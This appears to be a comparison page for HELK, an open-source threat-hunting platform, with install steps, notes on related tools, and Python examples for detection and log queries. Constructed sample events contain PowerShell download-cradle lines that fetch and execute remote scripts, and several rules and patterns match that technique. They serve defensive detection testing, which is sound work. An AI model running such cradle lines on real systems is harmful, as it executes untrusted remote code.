
Cyb3rWard0g / HELK

The Hunting ELK


Top Related Projects

  • Kibana: Your window into the Elastic Stack
  • ThreatHunter-Playbook: A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.
  • LogonTracer: Investigate malicious Windows logon by visualizing and analyzing Windows event log
  • sigma: Main Sigma Rule Repository

Quick Overview

The HELK (Hunting ELK) is an advanced threat hunting platform that leverages the ELK (Elasticsearch, Logstash, Kibana) stack along with other open-source tools. It's designed to provide security analysts and threat hunters with a powerful, all-in-one solution for log analysis, alerting, and visualization in cybersecurity contexts.

Pros

  • Comprehensive solution integrating multiple open-source tools for threat hunting
  • Pre-configured dashboards and visualizations for quick insights
  • Supports various data sources and log types
  • Active community and regular updates

Cons

  • Resource-intensive, requiring significant hardware resources
  • Complex setup process, especially for users new to ELK stack
  • Steep learning curve for full utilization of all features
  • May require additional tuning for specific environments

Getting Started

To set up HELK, follow these steps:

  1. Ensure your system meets the minimum requirements (at least 12GB RAM, 50GB disk space).
  2. Clone the HELK repository:
    git clone https://github.com/Cyb3rWard0g/HELK.git
    
  3. Change into the docker directory of the repository, where the installer lives:
    cd HELK/docker
    
  4. Run the installation script:
    sudo ./helk_install.sh
    
  5. Follow the prompts to choose an installation option. The installer's menu lists the component set of each option (Kafka, KSQL, ELK, NGINX, optionally ElastAlert, Spark and Jupyter) and the Elastic license it uses (Basic or Trial).
  6. Wait for the installation to complete and access the HELK interface via the provided URL.

Note: The installation process may take some time depending on your system and internet connection. Refer to the official documentation for more detailed instructions and troubleshooting.

Competitor Comparisons

Kibana: Your window into the Elastic Stack

Pros of Kibana

  • More mature and widely adopted project with extensive documentation
  • Offers a broader range of visualization and data exploration tools
  • Supports multiple data sources beyond just security logs

Cons of Kibana

  • Requires more setup and configuration for security-specific use cases
  • Less focused on threat hunting and security analytics out-of-the-box
  • Steeper learning curve for security professionals without ELK stack experience

Code Comparison

HELK (Python):

import random
import string

def get_jupyter_credentials():
    # 50 symbols from a 36-character alphabet. `random` is a Mersenne Twister, not a CSPRNG;
    # for credentials `secrets.choice` is the correct call.
    jupyter_token = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50))
    jupyter_password = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50))
    return jupyter_token, jupyter_password

Kibana (JavaScript):

export function createKibanaReporter({ getService }) {
  const log = getService('log');
  const config = getService('config');
  return {
    reportFailure: (message) => log.error(message)
  };
}

The HELK code snippet focuses on generating credentials for Jupyter notebooks, which is specific to its security-oriented setup. In contrast, the Kibana code relates to creating a reporter service, reflecting its more general-purpose nature for logging and configuration management.
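The snippet above seeds credentials from `random`, whose Mersenne Twister output is predictable once an attacker has seen enough of it. The following is an added example, not HELK's own code, showing the hardened form: the same 36-symbol alphabet and 50-character length, but drawn from the OS CSPRNG through `secrets`, plus an entropy calculation that shows why that length is generous even with a small alphabet. The function names are this example's own.

```python
"""Hardened credential generation (added example, not HELK's code)."""
import math
import secrets
import string
from typing import Tuple

ALPHABET = string.ascii_lowercase + string.digits  # the snippet's 36 symbols


def random_string(length: int = 50, alphabet: str = ALPHABET) -> str:
    """Uniformly sample `length` symbols from `alphabet` using the OS CSPRNG.
    `secrets.choice` is unbiased; `random.choice` must not be used here."""
    if length <= 0:
        raise ValueError("length must be positive")
    return "".join(secrets.choice(alphabet) for _ in range(length))


def get_jupyter_credentials(length: int = 50) -> Tuple[str, str]:
    """Drop-in replacement for the page's function, backed by `secrets`."""
    return random_string(length), random_string(length)


def entropy_bits(length: int, alphabet_size: int) -> float:
    """Entropy of a uniformly random string: length * log2(alphabet_size).
    50 symbols over 36 characters is about 258 bits, far beyond brute force."""
    return length * math.log2(alphabet_size)


def is_well_formed(token: str, length: int = 50, alphabet: str = ALPHABET) -> bool:
    """Check that a generated value has the expected length and alphabet."""
    return len(token) == length and all(c in alphabet for c in token)


if __name__ == "__main__":
    token, password = get_jupyter_credentials()
    print(token, password, entropy_bits(50, len(ALPHABET)))
```

Where the value is an opaque bearer token rather than something a human types, `secrets.token_urlsafe()` is the shorter idiom; the alphabet-based version is kept here so it is a like-for-like replacement for the snippet above.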

ThreatHunter-Playbook: A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.

Pros of ThreatHunter-Playbook

  • Provides a comprehensive collection of threat hunting techniques and procedures
  • Offers a structured approach to threat hunting with detailed playbooks
  • Includes a wide range of data sources and detection opportunities

Cons of ThreatHunter-Playbook

  • Lacks an integrated platform for data ingestion and analysis
  • Requires more manual effort to implement and execute threat hunting procedures
  • May have a steeper learning curve for beginners compared to HELK's all-in-one solution

Code Comparison

ThreatHunter-Playbook (YAML playbook example):

name: Suspicious PowerShell Download Cradle
description: Detects suspicious PowerShell download cradles
data_needed:
  - WinEvent
detection:
  selection:
    EventID: 4104
    ScriptBlockText|contains:
      - 'Net.WebClient'
      - 'DownloadString'

HELK (Logstash configuration example):

filter {
  # 4104 is PowerShell ScriptBlock logging. Unlike the playbook's list above,
  # which matches either string, this regex requires both, in this order.
  if [event_id] == 4104 {
    grok {
      match => { "ScriptBlockText" => "(?i)Net\.WebClient.*DownloadString" }
      # add_tag is only applied when the pattern matches
      add_tag => [ "suspicious_powershell_download" ]
    }
  }
}

Both repositories offer valuable resources for threat hunting, with ThreatHunter-Playbook focusing on comprehensive playbooks and HELK providing an integrated hunting platform. The choice between them depends on specific organizational needs and existing infrastructure.

LogonTracer: Investigate malicious Windows logon by visualizing and analyzing Windows event log

Pros of LogonTracer

  • Focused specifically on visualizing and analyzing Windows logon events
  • Lightweight and easy to deploy with minimal dependencies
  • Provides a user-friendly web interface for interactive analysis

Cons of LogonTracer

  • Limited scope compared to HELK's comprehensive threat hunting capabilities
  • Lacks advanced analytics and machine learning features
  • Does not support as wide a range of data sources as HELK

Code Comparison

LogonTracer (Python):

@app.route('/get_logon_data')
def get_logon_data():
    logon_data = neo4j_exec("MATCH (n:Logon) RETURN n")
    return jsonify(logon_data)

HELK (Elasticsearch query):

{
  "query": {
    "bool": {
      "must": [
        { "match": { "event_id": 4624 } },
        { "match": { "logon_type": 3 } }
      ]
    }
  }
}

LogonTracer focuses on querying a Neo4j database for logon events, while HELK uses Elasticsearch for more complex queries across various data types. HELK's approach allows for more flexible and comprehensive threat hunting capabilities, but LogonTracer's simplicity can be advantageous for quick logon analysis tasks.
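The query above returns raw 4624 network logons; a hunt usually wants them aggregated. The following added example (not HELK's or LogonTracer's code) builds that query with a time window and a per-source aggregation that surfaces one address authenticating to many distinct accounts, and applies the same logic locally to constructed events so it can be checked without a cluster. The field names `event_id`, `logon_type`, `src_ip`, `user` and `@timestamp` are assumptions about the index mapping.

```python
"""Hunting 4624 network logons (added example, not HELK or LogonTracer code)."""
from collections import defaultdict
from typing import Any, Dict, List, Tuple


def network_logon_query(lookback: str = "now-24h", top_n: int = 20) -> Dict[str, Any]:
    """Elasticsearch search body. Filter context replaces `must`/`match`: no
    scoring, cacheable, and `term` is the natural clause for numeric fields.
    The terms aggregation counts distinct users per source address."""
    return {
        "size": 0,
        "query": {"bool": {"filter": [
            {"term": {"event_id": 4624}},
            {"term": {"logon_type": 3}},
            {"range": {"@timestamp": {"gte": lookback}}},
        ]}},
        "aggs": {"by_src": {
            "terms": {"field": "src_ip", "size": top_n},
            "aggs": {"distinct_users": {"cardinality": {"field": "user"}}},
        }},
    }


# Constructed sample events, not real telemetry.
SAMPLE_LOGONS: List[Dict[str, Any]] = [
    {"event_id": 4624, "logon_type": 3, "src_ip": "10.0.0.5", "user": "alice"},
    {"event_id": 4624, "logon_type": 3, "src_ip": "10.0.0.5", "user": "bob"},
    {"event_id": 4624, "logon_type": 3, "src_ip": "10.0.0.5", "user": "carol"},
    {"event_id": 4624, "logon_type": 3, "src_ip": "10.0.0.5", "user": "dave"},
    {"event_id": 4624, "logon_type": 3, "src_ip": "10.0.0.9", "user": "alice"},
    {"event_id": 4624, "logon_type": 3, "src_ip": "10.0.0.9", "user": "alice"},
    {"event_id": 4624, "logon_type": 10, "src_ip": "10.0.0.7", "user": "erin"},   # RDP, not network
    {"event_id": 4625, "logon_type": 3, "src_ip": "10.0.0.7", "user": "frank"},   # failure, not 4624
]


def spray_candidates(events, min_users: int = 3) -> List[Tuple[str, int]]:
    """Local equivalent of the aggregation: (src_ip, distinct users) for every
    source that reached at least `min_users` accounts via network logons,
    most accounts first."""
    users = defaultdict(set)
    for e in events:
        if e.get("event_id") == 4624 and e.get("logon_type") == 3:
            users[e["src_ip"]].add(e["user"])
    hits = [(ip, len(u)) for ip, u in users.items() if len(u) >= min_users]
    return sorted(hits, key=lambda t: (-t[1], t[0]))


if __name__ == "__main__":
    print(spray_candidates(SAMPLE_LOGONS))  # one source hit four accounts
```

A successful 4624 from a sprayed source means the credentials were already valid; the earlier signal is the same shape of aggregation over 4625 failures, which the query takes with `event_id` changed and nothing else.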

sigma: Main Sigma Rule Repository

Pros of sigma

  • Flexible and generic approach to log analysis, applicable across various platforms
  • Large community-contributed rule set for detecting diverse threats
  • Easy integration with existing SIEM and log management tools

Cons of sigma

  • Requires additional tools or converters to implement rules in specific environments
  • May need more manual tuning and customization for optimal performance
  • Less out-of-the-box functionality compared to comprehensive platforms like HELK

Code Comparison

sigma rule example:

title: Suspicious Process Creation
detection:
    selection:
        EventID: 1
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
    condition: selection

HELK Jupyter Notebook example:

from elasticsearch import Elasticsearch

# Connect to the HELK Elasticsearch container and pull Sysmon process-creation
# events (EventID 1). The host-dict constructor and the `body=` argument are the
# 6.x/7.x client API; the default page size is 10 hits.
es = Elasticsearch([{'host': 'helk-elasticsearch', 'port': 9200}])
query = {"query": {"match": {"event_id": 1}}}
res = es.search(index="winlogbeat-*", body=query)
for hit in res['hits']['hits']:
    print(hit["_source"])

While sigma focuses on defining detection rules, HELK provides a complete platform for ingesting, processing, and analyzing data. sigma offers more flexibility in rule creation, while HELK provides an integrated environment for threat hunting and analysis.
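The rule formats shown on this page (the ThreatHunter-Playbook selection for PowerShell download cradles and the sigma rule for suspicious process creation) both express a selection as AND-ed fields whose listed values are OR-ed, with `|contains` and `|endswith` modifiers. The following added example, which is not code from HELK, sigma or ThreatHunter-Playbook, implements that evaluation over constructed events so both rules can be tested locally, and renders a selection as the Elasticsearch bool query a converter would produce. Field names are taken verbatim from the rules; mapping them onto an index's real fields (HELK renames Windows fields during ingestion) is left to the caller, and `case_insensitive` on `wildcard` is assumed to be available (ES 7.10 or later, keyword field).

```python
"""Sigma-style selection evaluator and ES renderer (added example, not project code)."""
from typing import Any, Dict, List

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {"EventID": 4104, "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"},
    {"EventID": 4104, "ScriptBlockText": "Get-Process | Sort-Object CPU -Descending"},
    {"EventID": 4104, "ScriptBlockText": "$c = new-object net.webclient; $c.downloadstring('http://203.0.113.5/b')"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
]

DOWNLOAD_CRADLE = {  # the ThreatHunter-Playbook selection shown above
    "selection": {"EventID": 4104, "ScriptBlockText|contains": ["Net.WebClient", "DownloadString"]},
    "condition": "selection",
}
SUSPICIOUS_PROC = {  # the sigma rule shown above
    "selection": {"EventID": 1, "Image|endswith": ["\\cmd.exe", "\\powershell.exe"]},
    "condition": "selection",
}


def _as_list(v: Any) -> List[Any]:
    return v if isinstance(v, list) else [v]


def _match_one(actual: Any, modifier: str, wanted: Any) -> bool:
    """One value against one field; string comparison is case-insensitive as in sigma."""
    if actual is None:
        return False
    hay, needle = str(actual).lower(), str(wanted).lower()
    if modifier == "":
        return hay == needle
    if modifier == "contains":
        return needle in hay
    if modifier == "endswith":
        return hay.endswith(needle)
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(selection: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """Keys are AND-ed; the values listed under one key are OR-ed."""
    for key, wanted in selection.items():
        field, _, modifier = key.partition("|")
        if not any(_match_one(event.get(field), modifier, w) for w in _as_list(wanted)):
            return False
    return True


def run_rule(rule: Dict[str, Any], events) -> List[Dict[str, Any]]:
    """Return the events a rule fires on. Only `condition: selection` is handled."""
    if rule.get("condition", "selection") != "selection":
        raise ValueError("only `condition: selection` is handled in this example")
    return [e for e in events if selection_matches(rule["selection"], e)]


def _wildcard_escape(s: str) -> str:
    # Backslash, * and ? are metacharacters in ES wildcard queries.
    return s.replace("\\", "\\\\").replace("*", "\\*").replace("?", "\\?")


def to_es_query(selection: Dict[str, Any]) -> Dict[str, Any]:
    """Render a selection as a bool query: term for equality, wildcard for
    contains (*v*) and endswith (*v). Each key becomes a should-group inside must."""
    must = []
    for key, wanted in selection.items():
        field, _, modifier = key.partition("|")
        should = []
        for w in _as_list(wanted):
            if modifier == "":
                should.append({"term": {field: w}})
            elif modifier in ("contains", "endswith"):
                pattern = "*" + _wildcard_escape(str(w)) + ("*" if modifier == "contains" else "")
                should.append({"wildcard": {field: {"value": pattern, "case_insensitive": True}}})
            else:
                raise ValueError(f"unsupported modifier: {modifier}")
        must.append({"bool": {"should": should, "minimum_should_match": 1}})
    return {"query": {"bool": {"must": must}}}


if __name__ == "__main__":
    for name, rule in (("download cradle", DOWNLOAD_CRADLE), ("suspicious process", SUSPICIOUS_PROC)):
        print(name, len(run_rule(rule, SAMPLE_EVENTS)), "hit(s)")
```

The third sample event is lowercase throughout and still fires, which is the behaviour the `(?i)` in the Logstash grok pattern earlier on this page buys; the ES rendering gets the same property from `case_insensitive`, and a converter targeting an older cluster would have to lowercase at index time instead.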


README

HELK


The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack. This project was developed primarily for research, but due to its flexible design and core components, it can be deployed in larger environments with the right configurations and scalable infrastructure.

Goals

  • Provide an open source hunting platform to the community and share the basics of Threat Hunting.
  • Expedite the time it takes to deploy a hunt platform.
  • Improve the testing and development of hunting use cases in an easier and more affordable way.
  • Enable Data Science capabilities while analyzing data via Apache Spark, GraphFrames & Jupyter Notebooks.

Current Status: Alpha

The project is currently in an alpha stage, which means that the code and the functionality are still changing. We haven't yet tested the system with large data sources and in many scenarios. We invite you to try it and welcome any feedback.


License: GPL-3.0 (HELK's GNU General Public License)